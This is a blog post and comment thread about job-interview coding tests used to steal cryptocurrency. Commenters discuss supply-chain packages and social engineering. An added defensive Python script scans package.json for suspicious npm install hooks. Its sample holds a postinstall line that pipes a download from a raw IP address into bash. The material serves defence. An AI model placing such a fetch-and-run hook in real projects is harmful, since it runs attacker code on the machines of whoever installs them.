[ $davids.sh ] — david shekunts blog


# [ $davids.sh ] · message #299

🤥 **Your crypto will be stolen right during the interview** 🤥

Digital gypsies are at it again, but now instead of wallets, they’re dipping their hands into crypto wallets:

  • You go to an interview
  • They throw a test at you on HTML, JS, CSS
  • ???
  • Boom, and you’re broke

Let’s discuss the third point in the comments

#scam #crypto

  • @ [ $davids.sh ] · # 1966

    Link to the original: https://www.linkedin.com/feed/update/urn:li:activity:7343968895298371586/

    Most likely, there should be a fake window that requests the seed phrase password, and after entering it, you get in.

    Perhaps the mechanism is simpler, this requires a deeper look.

    And in principle, this is one of the most beautiful types of social engineering: you come to the scammer yourself, into an environment that distracts from sleight of hand (or code).

    And the targeting is so good: candidates who work in crypto, want to get paid in crypto, have crypto.

    Mmm, just a sweet deal, not a scheme.

  • @ Ivan ITK 🚫 · # 1967

    Sorry, I'm not omniscient, you just keep picking topics) I've been in cybersecurity consulting for half my life, so I can tell you a lot about the subject) It's not new, it's been around for many years, usually such attacks were carried out by APTs with the aim of stealing commercial and even secret information. Then, when research reports became publicly available, ordinary scammers also became active. Currently, there are simply hundreds of schemes, from simple test ones if you want to work with us, to creating a whole company history on LinkedIn with employees and reviews, and real interviews with live HR drops.

    As for the attack vectors themselves, there has been such a diverse number of them in the last 2 years (references to all supply chain attacks and bugs found on GitHub during that time). The simplest way is to inject some kind of package that downloads a binary and runs it with user privileges, doing whatever is needed.

    If we consider the crypto case, for example, very recently a bug was fixed in a cryptographic library that was used by almost all decentralized wallets, where it was possible to gain access to the private key (if I'm not mistaken, it was a regular prototype pollution at its core) or there was a bug in the cryptography implementation itself, which allowed recovering the private key. And there are also special confirmations on Ethereum that allow your funds to be debited sometime later. There are special services for checking and revoking such signatures.

    Brief summary, in the 21st century, cybersecurity is no longer a separate profession, it is already a necessity for every person. Without delving into theory, you shouldn't be surprised by such cases. And even if you do delve into it, there's always social engineering, which will make you unconsciously give everything to the attackers yourself.
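A defender-side check for the install-time vector described in the post above (a package that downloads a binary and runs it with user privileges), as an added example that is not part of the thread: it scans a take-home task's package.json for npm lifecycle hooks that run automatically on `npm install` and flags download-and-run patterns in them. The hook names are npm's real ones; the sample package.json and the pattern list are constructed for illustration.

```python
"""Audit a take-home test repo's package.json for install-time hooks that could fetch and run a binary."""
import json
import re

# npm runs these scripts automatically during `npm install`, before anyone opens the code.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed heuristics: commands that download-and-execute or hide the real payload.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node)\b"), "pipes a download into an interpreter"),
    (re.compile(r"\bnode\s+-e\b"), "runs inline JavaScript"),
    (re.compile(r"\b(base64|atob|Buffer\.from\([^)]*base64)"), "decodes an encoded payload"),
    (re.compile(r"chmod\s+\+x|\./\S+\.(bin|exe)\b|\bpowershell\b|\biex\b", re.I), "executes a fetched binary"),
    (re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}"), "contacts a raw IP address"),
]


def audit_package_json(text):
    """Return a list of (hook, reasons) findings for the given package.json text."""
    pkg = json.loads(text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # `test`, `build`, etc. only run when you ask for them
        reasons = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
        # Any install-time hook deserves a look; a matching pattern is a red flag.
        findings.append((hook, reasons or ["install-time hook present; review manually"]))
    return findings


# Constructed sample: a "frontend test task" whose postinstall fetches and runs a script.
SAMPLE_PACKAGE_JSON = """
{
  "name": "frontend-test-task",
  "scripts": {
    "postinstall": "curl -s http://203.0.113.7/setup.sh | bash",
    "test": "jest"
  }
}
"""

if __name__ == "__main__":
    for hook, reasons in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {'; '.join(reasons)}")
```

Run it against the task repo before `npm install`; the safer habit is `npm install --ignore-scripts` in a throwaway VM and reading every flagged hook first.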

  • @ Ivan ITK 🚫 · # 1968

    Here are the details of what I described above:

  • @ [ $davids.sh ] · # 1969

    In Go, there was a similar incident with downloading binaries recently.

    I'm not even sure if it's fixed or if they even can fix it.

    I remember that in Deno or Bun there was a feature where when you import a dependency, you have to explicitly state what it can do, but in Go...

    I'll have to read up on it.

  • @ Ivan ITK 🚫 · # 1970

    In Node, features have been natively added with flags for permission control, similar to Deno.

  • @ O. K, ✝️ · # 1971

    Is there peace behind seven virtual machines?

  • @ Ivan ITK 🚫 · # 1972

    In today's world, there are too many ways to gain system privileges. There are also sandbox escape schemes for virtual machines.

  • @ O. K, ✝️ · # 1973

    Then, should we separate the physical machines themselves?

  • @ Ivan ITK 🚫 · # 1974

    This will be most effective

  • @ O. K, ✝️ · # 1975

    Thank you for your time

  • @ Ivan ITK 🚫 · # 1977